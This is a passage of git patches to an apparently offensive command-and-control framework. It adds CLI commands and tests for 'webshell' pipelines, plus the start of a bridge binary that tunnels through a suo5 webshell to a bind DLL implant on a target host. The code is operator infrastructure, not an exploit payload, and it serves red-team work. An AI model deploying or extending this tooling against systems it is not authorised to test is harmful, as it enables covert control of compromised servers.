From 0a2310b2cb1cc523608e0d6b6d567feb61d45192 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:26 +0800 Subject: [PATCH 01/19] test(config): fix config ai example assertion --- client/command/config/commands_test.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/command/config/commands_test.go b/client/command/config/commands_test.go index efd13adb..18e344a9 100644 --- a/client/command/config/commands_test.go +++ b/client/command/config/commands_test.go @@ -24,7 +24,7 @@ func TestCommandsIncludeAIConfigSubcommand(t *testing.T) { if aiCmd.Hidden { t.Fatal("config ai command should be visible") } - if !strings.Contains(aiCmd.Example, "config ai --show") { + if !strings.Contains(aiCmd.Example, "config ai\n") { t.Fatalf("expected config ai examples, got:\n%s", aiCmd.Example) } if strings.Contains(aiCmd.Example, "ai-config --") { From 26e9705a06b32fb2235ed9e37f70cf74d6c57bbe Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:32 +0800 Subject: [PATCH 02/19] test(llm): isolate env vars in resolve tests --- server/internal/llm/resolve_test.go | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/server/internal/llm/resolve_test.go b/server/internal/llm/resolve_test.go index e6b475f0..87badc0c 100644 --- a/server/internal/llm/resolve_test.go +++ b/server/internal/llm/resolve_test.go @@ -5,6 +5,23 @@ import ( "testing" ) +var resolveEnvKeys = []string{ + "BRIDGE_API_KEY", + "BRIDGE_OPENAI_BASE_URL", + "BRIDGE_OPENAI_API_KEY", + "BRIDGE_DEEPSEEK_BASE_URL", + "BRIDGE_DEEPSEEK_API_KEY", + "BRIDGE_GROQ_BASE_URL", + "BRIDGE_GROQ_API_KEY", + "BRIDGE_CUSTOM_LLM_BASE_URL", + "BRIDGE_CUSTOM_LLM_API_KEY", + "OPENAI_API_KEY", + "OPENROUTER_API_KEY", + "DEEPSEEK_API_KEY", + "GROQ_API_KEY", + "MOONSHOT_API_KEY", +} + func TestResolve(t *testing.T) { tests := []struct { name string @@ -117,6 +134,9 @@ func TestResolve(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { + for _, key := range resolveEnvKeys { + t.Setenv(key, "") + } for k, v := range tt.envs { t.Setenv(k, v) } From 536aa5d0e8ac3d0fb6db430702b3986785b99797 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:38 +0800 Subject: [PATCH 03/19] chore(deps): add suo5 and proxyclient dependencies --- go.mod | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/go.mod b/go.mod index 58500c5f..74060951 100644 --- a/go.mod +++ b/go.mod @@ -10,6 +10,7 @@ require ( github.com/chainreactors/logs v0.0.0-20250312104344-9f30fa69d3c9 github.com/chainreactors/mals v0.0.0-20250717185731-227f71a931fa github.com/chainreactors/parsers v0.0.0-20250225073555-ab576124d61f + github.com/chainreactors/proxyclient v1.0.4-0.20260218115902-74a84a4535b0 github.com/chainreactors/rem v0.3.0 github.com/chainreactors/tui v0.1.1 github.com/chainreactors/utils v0.0.0-20241209140746-65867d2f78b2 @@ -46,6 +47,7 @@ require ( github.com/traefik/yaegi v0.14.3 github.com/wabzsy/gonut v1.0.0 github.com/yuin/gopher-lua v1.1.1 + github.com/zema1/suo5 v1.3.2-0.20250219115440-31983ee59a83 gopkg.in/yaml.v3 v3.0.1 gorm.io/driver/postgres v1.6.0 gorm.io/gorm v1.25.10 @@ -79,6 +81,7 @@ require ( github.com/alibabacloud-go/tea v1.4.0 // indirect github.com/alibabacloud-go/tea-utils/v2 v2.0.7 // indirect github.com/aliyun/credentials-go v1.4.7 // indirect + github.com/andybalholm/brotli v1.1.0 // indirect github.com/atotto/clipboard v0.1.4 // indirect github.com/aws/aws-sdk-go-v2 v1.41.1 // indirect github.com/aws/aws-sdk-go-v2/config v1.32.8 // indirect @@ -105,7 +108,6 @@ require ( github.com/cbroglie/mustache v1.4.0 // indirect github.com/cenkalti/backoff/v5 v5.0.3 // indirect github.com/chainreactors/fingers v0.0.0-20240702104653-a66e34aa41df // indirect - github.com/chainreactors/proxyclient v1.0.4-0.20260218115902-74a84a4535b0 // indirect github.com/charmbracelet/bubbles v0.21.1-0.20250623103423-23b8fd6302d7 // indirect github.com/charmbracelet/colorprofile v0.4.3 // indirect github.com/charmbracelet/harmonica v0.2.0 // indirect @@ -126,6 +128,7 @@ require ( github.com/clipperhouse/displaywidth v0.9.0 // indirect github.com/clipperhouse/stringish v0.1.1 // indirect github.com/clipperhouse/uax29/v2 v2.7.0 // indirect + github.com/cloudflare/circl v1.3.8 // indirect github.com/creack/pty v1.1.24 // indirect github.com/dlclark/regexp2 v1.11.5 // indirect github.com/docker/go-connections v0.5.0 // indirect @@ -138,9 +141,11 @@ require ( github.com/go-dedup/megophone v0.0.0-20170830025436-f01be21026f5 // indirect github.com/go-dedup/simhash v0.0.0-20170904020510-9ecaca7b509c // indirect github.com/go-dedup/text v0.0.0-20170907015346-8bb1b95e3cb7 // indirect + github.com/go-gost/gosocks5 v0.3.0 // indirect github.com/go-jose/go-jose/v4 v4.1.3 // indirect github.com/go-sql-driver/mysql v1.8.1 // indirect github.com/go-telegram-bot-api/telegram-bot-api v4.6.4+incompatible // indirect + github.com/gobwas/glob v0.2.3 // indirect github.com/goccy/go-yaml v1.12.0 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/google/uuid v1.6.0 // indirect @@ -156,6 +161,8 @@ require ( github.com/jinzhu/inflection v1.0.0 // indirect github.com/jinzhu/now v1.1.5 // indirect github.com/json-iterator/go v1.1.13-0.20220915233716-71ac16282d12 // indirect + github.com/kataras/golog v0.1.8 // indirect + github.com/kataras/pio v0.0.11 // indirect github.com/klauspost/cpuid/v2 v2.2.7 // indirect github.com/klauspost/reedsolomon v1.12.0 // indirect github.com/lib/pq v1.10.9 // indirect @@ -184,6 +191,7 @@ require ( github.com/opencontainers/image-spec v1.1.0 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/reeflective/readline v1.1.3 // indirect + github.com/refraction-networking/utls v1.6.4 // indirect github.com/riobard/go-bloom v0.0.0-20200614022211-cdc8013cb5b3 // indirect github.com/rivo/uniseg v0.4.7 // indirect github.com/saferwall/pe v1.5.6 // indirect @@ -204,6 +212,7 @@ require ( github.com/yuin/gluamapper v0.0.0-20150323120927-d836955830e7 // indirect github.com/yuin/goldmark v1.7.4 // indirect github.com/yuin/goldmark-emoji v1.0.3 // indirect + github.com/zema1/rawhttp v0.2.0 // indirect golang.org/x/mod v0.32.0 // indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20231012003039-104605ab7028 // indirect @@ -216,6 +225,7 @@ require ( replace ( github.com/imdario/mergo => dario.cat/mergo v1.0.0 github.com/miekg/dns => github.com/miekg/dns v1.1.58 + github.com/zema1/suo5 => github.com/M09Ic/suo5 v1.3.4 golang.org/x/crypto => golang.org/x/crypto v0.48.0 golang.org/x/mod => golang.org/x/mod v0.17.0 golang.org/x/net => golang.org/x/net v0.50.0 From db5889aff64a6de788591149be9a063a00766ffd Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:44 +0800 Subject: [PATCH 04/19] feat(pipeline): add webshell pipeline client commands --- client/command/pipeline/commands.go | 95 +++++++++- client/command/pipeline/commands_test.go | 5 +- client/command/pipeline/webshell.go | 213 +++++++++++++++++++++++ client/command/pipeline/webshell_test.go | 170 ++++++++++++++++++ client/command/testsupport/recorder.go | 12 ++ 5 files changed, 491 insertions(+), 4 deletions(-) create mode 100644 client/command/pipeline/webshell.go create mode 100644 client/command/pipeline/webshell_test.go diff --git a/client/command/pipeline/commands.go b/client/command/pipeline/commands.go index ce805e68..c17a97ed 100644 --- a/client/command/pipeline/commands.go +++ b/client/command/pipeline/commands.go @@ -243,16 +243,107 @@ rem update interval --pipeline-id rem_graph_api_03 --agent-id uDM0BgG6 5000 remCmd.AddCommand(listremCmd, newRemCmd, startRemCmd, stopRemCmd, deleteRemCmd, updateRemCmd) + // WebShell pipeline commands + webshellCmd := &cobra.Command{ + Use: "webshell", + Short: "Manage WebShell pipelines", + Long: "List, create, start, stop, and delete WebShell bridge pipelines.", + RunE: func(cmd *cobra.Command, args []string) error { + return cmd.Help() + }, + } + + listWebShellCmd := &cobra.Command{ + Use: "list [listener]", + Short: "List webshell pipelines", + RunE: func(cmd *cobra.Command, args []string) error { + return ListWebShellCmd(cmd, con) + }, + } + common.BindArgCompletions(listWebShellCmd, nil, common.ListenerIDCompleter(con)) + + newWebShellCmd := &cobra.Command{ + Use: "new [name]", + Short: "Register a new webshell pipeline", + Long: "Register a CustomPipeline(type=webshell) for the webshell-bridge binary to connect to.", + Args: cobra.MaximumNArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return NewWebShellCmd(cmd, con) + }, + Example: `~~~ +webshell new --listener my-listener +webshell new ws1 --listener my-listener +~~~`, + } + common.BindFlag(newWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(newWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + newWebShellCmd.MarkFlagRequired("listener") + + startWebShellCmd := &cobra.Command{ + Use: "start ", + Short: "Start a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return StartWebShellCmd(cmd, con) + }, + } + common.BindFlag(startWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(startWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(startWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + stopWebShellCmd := &cobra.Command{ + Use: "stop ", + Short: "Stop a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return StopWebShellCmd(cmd, con) + }, + } + common.BindFlag(stopWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(stopWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(stopWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + deleteWebShellCmd := &cobra.Command{ + Use: "delete ", + Short: "Delete a webshell pipeline", + Args: cobra.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return DeleteWebShellCmd(cmd, con) + }, + } + common.BindFlag(deleteWebShellCmd, func(f *pflag.FlagSet) { + f.StringP("listener", "l", "", "listener id") + }) + common.BindFlagCompletions(deleteWebShellCmd, func(comp carapace.ActionMap) { + comp["listener"] = common.ListenerIDCompleter(con) + }) + common.BindArgCompletions(deleteWebShellCmd, nil, common.PipelineCompleter(con, webshellPipelineType)) + + webshellCmd.AddCommand(listWebShellCmd, newWebShellCmd, startWebShellCmd, stopWebShellCmd, deleteWebShellCmd) + // Enable wizard for pipeline commands - common.EnableWizardForCommands(tcpCmd, httpCmd, bindCmd, newRemCmd) + common.EnableWizardForCommands(tcpCmd, httpCmd, bindCmd, newRemCmd, newWebShellCmd) // Register wizard providers for dynamic options registerWizardProviders(tcpCmd, con) registerWizardProviders(httpCmd, con) registerWizardProviders(bindCmd, con) registerWizardProviders(newRemCmd, con) + registerWizardProviders(newWebShellCmd, con) - return []*cobra.Command{tcpCmd, httpCmd, bindCmd, remCmd} + return []*cobra.Command{tcpCmd, httpCmd, bindCmd, remCmd, webshellCmd} } // registerWizardProviders registers dynamic option providers for wizard. diff --git a/client/command/pipeline/commands_test.go b/client/command/pipeline/commands_test.go index 075ecd86..098bdd70 100644 --- a/client/command/pipeline/commands_test.go +++ b/client/command/pipeline/commands_test.go @@ -9,8 +9,8 @@ import ( func TestCommandsExposeExpectedPipelineRoots(t *testing.T) { cmds := Commands(&core.Console{}) - if len(cmds) != 4 { - t.Fatalf("pipeline command roots = %d, want 4", len(cmds)) + if len(cmds) != 5 { + t.Fatalf("pipeline command roots = %d, want 5", len(cmds)) } want := map[string]bool{ @@ -18,6 +18,7 @@ func TestCommandsExposeExpectedPipelineRoots(t *testing.T) { consts.HTTPPipeline: true, consts.CommandPipelineBind: true, consts.CommandRem: true, + "webshell": true, } for _, cmd := range cmds { delete(want, cmd.Name()) diff --git a/client/command/pipeline/webshell.go b/client/command/pipeline/webshell.go new file mode 100644 index 00000000..692a290e --- /dev/null +++ b/client/command/pipeline/webshell.go @@ -0,0 +1,213 @@ +package pipeline + +import ( + "fmt" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/malice-network/client/core" + "github.com/chainreactors/tui" + "github.com/spf13/cobra" +) + +const webshellPipelineType = "webshell" + +// ListWebShellCmd lists all webshell pipelines for a given listener. +func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { + listenerID := cmd.Flags().Arg(0) + pipes, err := con.Rpc.ListPipelines(con.Context(), &clientpb.Listener{ + Id: listenerID, + }) + if err != nil { + return err + } + + var webshells []*clientpb.CustomPipeline + for _, pipe := range pipes.Pipelines { + if pipe.Type == webshellPipelineType { + if custom := pipe.GetCustom(); custom != nil { + webshells = append(webshells, custom) + } + } + } + + if len(webshells) == 0 { + con.Log.Warnf("No webshell pipelines found\n") + return nil + } + + con.Log.Console(tui.RendStructDefault(webshells) + "\n") + return nil +} + +// NewWebShellCmd registers a new webshell pipeline using the CustomPipeline mechanism. +// The actual bridge binary (webshell-bridge) connects to this pipeline externally. +func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + + if listenerID == "" { + return fmt.Errorf("listener id is required") + } + if name == "" { + name = fmt.Sprintf("webshell_%s", listenerID) + } + + pipeline := &clientpb.Pipeline{ + Name: name, + ListenerId: listenerID, + Enable: true, + Type: webshellPipelineType, + Body: &clientpb.Pipeline_Custom{ + Custom: &clientpb.CustomPipeline{ + Name: name, + ListenerId: listenerID, + Host: resolveWebShellListenerHost(con, listenerID), + }, + }, + } + + _, err := con.Rpc.RegisterPipeline(con.Context(), pipeline) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("register webshell pipeline %s: %w", name, err)) + } + + con.Log.Importantf("WebShell pipeline %s registered\n", name) + + _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: listenerID, + Pipeline: pipeline, + }) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + } + + con.Log.Importantf("WebShell pipeline %s started\n", name) + con.Log.Infof("The bridge should already be running for listener %s and waiting on pipeline control.\n", listenerID) + con.Log.Infof("If the DLL is not loaded yet, the bridge will keep retrying until the rem server becomes reachable.\n") + return nil +} + +// StartWebShellCmd starts a stopped webshell pipeline. +func StartWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + listenerID = pipeline.GetListenerId() + _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: listenerID, + }) + if err != nil { + return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + } + con.Log.Importantf("WebShell pipeline %s started\n", name) + return nil +} + +// StopWebShellCmd stops a running webshell pipeline. +func StopWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + _, err = con.Rpc.StopPipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: pipeline.GetListenerId(), + }) + if err != nil { + return err + } + con.Log.Importantf("WebShell pipeline %s stopped\n", name) + return nil +} + +// DeleteWebShellCmd deletes a webshell pipeline. +func DeleteWebShellCmd(cmd *cobra.Command, con *core.Console) error { + name := cmd.Flags().Arg(0) + listenerID, _ := cmd.Flags().GetString("listener") + pipeline, err := resolveWebShellPipeline(con, name, listenerID) + if err != nil { + return err + } + _, err = con.Rpc.DeletePipeline(con.Context(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: pipeline.GetListenerId(), + }) + if err != nil { + return err + } + con.Log.Importantf("WebShell pipeline %s deleted\n", name) + return nil +} + +func resolveWebShellListenerHost(con *core.Console, listenerID string) string { + if listenerID == "" || con == nil { + return "" + } + if listener, ok := con.Listeners[listenerID]; ok && listener.GetIp() != "" { + return listener.GetIp() + } + listeners, err := con.Rpc.GetListeners(con.Context(), &clientpb.Empty{}) + if err != nil { + return "" + } + for _, listener := range listeners.GetListeners() { + if listener.GetId() == listenerID { + return listener.GetIp() + } + } + return "" +} + +func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clientpb.Pipeline, error) { + if name == "" { + return nil, fmt.Errorf("webshell pipeline name is required") + } + if listenerID == "" { + if pipe, ok := con.Pipelines[name]; ok { + if pipe.GetType() != webshellPipelineType { + return nil, fmt.Errorf("pipeline %s is type %s, not %s", name, pipe.GetType(), webshellPipelineType) + } + return pipe, nil + } + } + + pipes, err := con.Rpc.ListPipelines(con.Context(), &clientpb.Listener{Id: listenerID}) + if err != nil { + return nil, err + } + + var match *clientpb.Pipeline + for _, pipe := range pipes.GetPipelines() { + if pipe == nil || pipe.GetName() != name { + continue + } + if pipe.GetType() != webshellPipelineType { + return nil, fmt.Errorf("pipeline %s is type %s, not %s", name, pipe.GetType(), webshellPipelineType) + } + if match != nil && match.GetListenerId() != pipe.GetListenerId() { + return nil, fmt.Errorf("multiple webshell pipelines named %s found, please specify --listener", name) + } + match = pipe + } + if match == nil { + if listenerID != "" { + return nil, fmt.Errorf("webshell pipeline %s not found on listener %s", name, listenerID) + } + return nil, fmt.Errorf("webshell pipeline %s not found", name) + } + return match, nil +} + +func webShellBridgeHint(listenerID string, err error) error { + if listenerID == "" { + return err + } + return fmt.Errorf("%w; start webshell-bridge for listener %s first", err, listenerID) +} diff --git a/client/command/pipeline/webshell_test.go b/client/command/pipeline/webshell_test.go new file mode 100644 index 00000000..4234ff58 --- /dev/null +++ b/client/command/pipeline/webshell_test.go @@ -0,0 +1,170 @@ +package pipeline_test + +import ( + "context" + "errors" + "strings" + "testing" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + pipelinecmd "github.com/chainreactors/malice-network/client/command/pipeline" + "github.com/chainreactors/malice-network/client/command/testsupport" + "github.com/spf13/cobra" +) + +func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Console.Listeners["listener-a"] = &clientpb.Listener{ + Id: "listener-a", + Ip: "10.10.10.10", + } + + cmd := newWebShellTestCommand(t, "--listener", "listener-a", "ws-a") + if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("NewWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 2 { + t.Fatalf("call count = %d, want 2", len(calls)) + } + if calls[0].Method != "RegisterPipeline" { + t.Fatalf("first method = %s, want RegisterPipeline", calls[0].Method) + } + + req, ok := calls[0].Request.(*clientpb.Pipeline) + if !ok { + t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[0].Request) + } + custom, ok := req.Body.(*clientpb.Pipeline_Custom) + if !ok { + t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) + } + if custom.Custom.GetHost() != "10.10.10.10" { + t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "10.10.10.10") + } +} + +func TestNewWebShellCmdFallsBackToGetListenersForHost(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnListeners("GetListeners", func(_ context.Context, _ any) (*clientpb.Listeners, error) { + return &clientpb.Listeners{ + Listeners: []*clientpb.Listener{{ + Id: "listener-b", + Ip: "192.0.2.15", + }}, + }, nil + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b") + if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("NewWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 3 { + t.Fatalf("call count = %d, want 3", len(calls)) + } + if calls[0].Method != "GetListeners" { + t.Fatalf("first method = %s, want GetListeners", calls[0].Method) + } + req, ok := calls[1].Request.(*clientpb.Pipeline) + if !ok { + t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[1].Request) + } + custom, ok := req.Body.(*clientpb.Pipeline_Custom) + if !ok { + t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) + } + if custom.Custom.GetHost() != "192.0.2.15" { + t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "192.0.2.15") + } +} + +func TestNewWebShellCmdWrapsRegisterErrorWithBridgeHint(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnEmpty("RegisterPipeline", func(_ context.Context, _ any) (*clientpb.Empty, error) { + return nil, errors.New("listener not found") + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-c", "ws-c") + err := pipelinecmd.NewWebShellCmd(cmd, h.Console) + if err == nil { + t.Fatal("NewWebShellCmd error = nil, want error") + } + if !strings.Contains(err.Error(), "start webshell-bridge for listener listener-c first") { + t.Fatalf("error = %q, want bridge hint", err) + } +} + +func TestStartWebShellCmdRejectsNonWebShellPipeline(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Console.Pipelines["tcp-a"] = &clientpb.Pipeline{ + Name: "tcp-a", + ListenerId: "listener-a", + Type: "tcp", + } + + cmd := newWebShellTestCommand(t, "tcp-a") + err := pipelinecmd.StartWebShellCmd(cmd, h.Console) + if err == nil { + t.Fatal("StartWebShellCmd error = nil, want error") + } + if !strings.Contains(err.Error(), "pipeline tcp-a is type tcp, not webshell") { + t.Fatalf("error = %q, want pipeline type validation", err) + } + if calls := h.Recorder.Calls(); len(calls) != 0 { + t.Fatalf("call count = %d, want 0", len(calls)) + } +} + +func TestStopWebShellCmdResolvesListenerAndStopsMatchingPipeline(t *testing.T) { + h := testsupport.NewClientHarness(t) + h.Recorder.OnPipelines("ListPipelines", func(_ context.Context, in any) (*clientpb.Pipelines, error) { + listener, ok := in.(*clientpb.Listener) + if !ok { + t.Fatalf("request type = %T, want *clientpb.Listener", in) + } + if listener.GetId() != "listener-z" { + t.Fatalf("listener id = %q, want %q", listener.GetId(), "listener-z") + } + return &clientpb.Pipelines{ + Pipelines: []*clientpb.Pipeline{{ + Name: "ws-z", + ListenerId: "listener-z", + Type: "webshell", + }}, + }, nil + }) + + cmd := newWebShellTestCommand(t, "--listener", "listener-z", "ws-z") + if err := pipelinecmd.StopWebShellCmd(cmd, h.Console); err != nil { + t.Fatalf("StopWebShellCmd failed: %v", err) + } + + calls := h.Recorder.Calls() + if len(calls) != 2 { + t.Fatalf("call count = %d, want 2", len(calls)) + } + if calls[1].Method != "StopPipeline" { + t.Fatalf("second method = %s, want StopPipeline", calls[1].Method) + } + req, ok := calls[1].Request.(*clientpb.CtrlPipeline) + if !ok { + t.Fatalf("stop request type = %T, want *clientpb.CtrlPipeline", calls[1].Request) + } + if req.GetListenerId() != "listener-z" { + t.Fatalf("stop listener_id = %q, want %q", req.GetListenerId(), "listener-z") + } +} + +func newWebShellTestCommand(t *testing.T, args ...string) *cobra.Command { + t.Helper() + + cmd := &cobra.Command{} + cmd.Flags().StringP("listener", "l", "", "listener id") + if err := cmd.Flags().Parse(args); err != nil { + t.Fatalf("parse flags: %v", err) + } + return cmd +} diff --git a/client/command/testsupport/recorder.go b/client/command/testsupport/recorder.go index 65256b23..5eff6e15 100644 --- a/client/command/testsupport/recorder.go +++ b/client/command/testsupport/recorder.go @@ -383,6 +383,18 @@ func (r *RecorderRPC) GetAllCertificates(ctx context.Context, in *clientpb.Empty return &clientpb.Certs{}, nil } +func (r *RecorderRPC) RegisterPipeline(ctx context.Context, in *clientpb.Pipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { + return r.emptyResponse(ctx, "RegisterPipeline", in) +} + +func (r *RecorderRPC) ListPipelines(ctx context.Context, in *clientpb.Listener, opts ...grpc.CallOption) (*clientpb.Pipelines, error) { + r.recordPrimary(ctx, "ListPipelines", in) + if responder, ok := r.pipelinesResponders["ListPipelines"]; ok { + return responder(ctx, in) + } + return &clientpb.Pipelines{}, nil +} + func (r *RecorderRPC) StartPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { return r.emptyResponse(ctx, "StartPipeline", in) } From 8e4fc972e4739bf075d68f8a1d584006e8aa3c76 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 17:10:52 +0800 Subject: [PATCH 05/19] feat(webshell-bridge): add webshell bridge server binary --- server/cmd/webshell-bridge/bridge.go | 779 +++++++++++++++++++ server/cmd/webshell-bridge/bridge_test.go | 509 ++++++++++++ server/cmd/webshell-bridge/channel.go | 273 +++++++ server/cmd/webshell-bridge/channel_test.go | 541 +++++++++++++ server/cmd/webshell-bridge/config.go | 13 + server/cmd/webshell-bridge/main.go | 67 ++ server/cmd/webshell-bridge/main_test.go | 15 + server/cmd/webshell-bridge/session.go | 118 +++ server/cmd/webshell-bridge/transport.go | 131 ++++ server/cmd/webshell-bridge/transport_test.go | 58 ++ 10 files changed, 2504 insertions(+) create mode 100644 server/cmd/webshell-bridge/bridge.go create mode 100644 server/cmd/webshell-bridge/bridge_test.go create mode 100644 server/cmd/webshell-bridge/channel.go create mode 100644 server/cmd/webshell-bridge/channel_test.go create mode 100644 server/cmd/webshell-bridge/config.go create mode 100644 server/cmd/webshell-bridge/main.go create mode 100644 server/cmd/webshell-bridge/main_test.go create mode 100644 server/cmd/webshell-bridge/session.go create mode 100644 server/cmd/webshell-bridge/transport.go create mode 100644 server/cmd/webshell-bridge/transport_test.go diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go new file mode 100644 index 00000000..2f1d374a --- /dev/null +++ b/server/cmd/webshell-bridge/bridge.go @@ -0,0 +1,779 @@ +package main + +import ( + "context" + "errors" + "fmt" + "io" + "strconv" + "sync" + "time" + + "strings" + + "github.com/chainreactors/IoM-go/consts" + mtls "github.com/chainreactors/IoM-go/mtls" + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + iomtypes "github.com/chainreactors/IoM-go/types" + "github.com/chainreactors/logs" + "github.com/chainreactors/malice-network/helper/cryptography" + "github.com/chainreactors/malice-network/helper/implanttypes" + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/metadata" + "google.golang.org/grpc/status" +) + +const ( + pipelineType = "webshell" + checkinInterval = 30 * time.Second + retryBaseDelay = 2 * time.Second + retryMaxDelay = 60 * time.Second + retryMaxAttempts = 20 +) + +// Bridge is the WebShell bridge that connects to the IoM server via +// ListenerRPC and manages webshell-backed sessions through a suo5 tunnel. +// +// The bridge owns the listener runtime only. Custom pipelines are created and +// controlled through pipeline start/stop events from the server. +type Bridge struct { + cfg *Config + transport dialTransport + + conn *grpc.ClientConn + rpc listenerrpc.ListenerRPCClient + jobStream listenerrpc.ListenerRPC_JobStreamClient + + activeMu sync.Mutex + active *pipelineRuntime +} + +type pipelineRuntime struct { + name string + ctx context.Context + cancel context.CancelFunc + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient + sendMu sync.Mutex + sessions sync.Map // sessionID -> *Session + sessionsByRawID sync.Map // rawSID (uint32) -> *Session (for CtrlListenerSyncSession lookup) + streamTasks sync.Map // "sessionID:taskID" -> context.CancelFunc (pump goroutine) + secureConfig *implanttypes.SecureConfig + done chan struct{} +} + +// NewBridge creates a new bridge instance. +func NewBridge(cfg *Config) (*Bridge, error) { + transport, err := NewTransport(cfg.Suo5URL) + if err != nil { + return nil, fmt.Errorf("init transport: %w", err) + } + + return &Bridge{ + cfg: cfg, + transport: transport, + }, nil +} + +// Start runs the bridge lifecycle: +// 1. Connect to server via mTLS +// 2. Register listener +// 3. Open JobStream +// 4. Wait for pipeline start/stop controls +func (b *Bridge) Start(parent context.Context) error { + ctx, cancel := context.WithCancel(parent) + defer cancel() + + if err := b.connect(ctx); err != nil { + return fmt.Errorf("connect: %w", err) + } + defer b.shutdown() + defer b.conn.Close() + logs.Log.Important("connected to server") + + go func() { + <-ctx.Done() + if b.conn != nil { + _ = b.conn.Close() + } + }() + + if _, err := b.rpc.RegisterListener(b.listenerCtx(ctx), &clientpb.RegisterListener{ + Name: b.cfg.ListenerName, + Host: b.cfg.ListenerIP, + }); err != nil { + return fmt.Errorf("register listener: %w", err) + } + logs.Log.Importantf("registered listener: %s", b.cfg.ListenerName) + + var err error + b.jobStream, err = b.rpc.JobStream(b.listenerCtx(ctx)) + if err != nil { + return fmt.Errorf("open job stream: %w", err) + } + logs.Log.Importantf("waiting for pipeline %s control messages", b.cfg.PipelineName) + + return b.runJobLoop(ctx) +} + +// connectDLL establishes a malefic channel to the bind DLL on the target +// through the suo5 tunnel. Retries with exponential backoff up to +// retryMaxAttempts before giving up. +func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error { + sessionID := cryptography.RandomString(8) + channel := NewChannel(b.transport, b.cfg.DLLAddr, runtime.name) + + logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.DLLAddr) + + 